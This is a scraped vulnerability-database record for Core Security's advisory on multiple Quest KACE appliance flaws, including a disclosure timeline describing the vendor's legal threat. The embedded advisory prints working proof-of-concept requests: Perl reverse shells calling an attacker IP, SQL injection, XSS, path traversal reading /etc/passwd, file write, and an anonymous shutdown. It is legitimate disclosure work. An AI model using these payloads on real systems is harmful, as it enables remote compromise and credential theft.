KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0602",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11142"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11142",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 2.1,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-11142",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-15644",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-11142",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11142",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-15644",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1212",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-11142",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027 scripts in the Quest KACE System Management Appliance 8.0.318 are accessible only from localhost. This restriction can be bypassed by modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers in a POST request. An anonymous user can abuse this vulnerability to execute critical functions without authorization. Quest KACE System Management Appliance Contains an authorization vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core 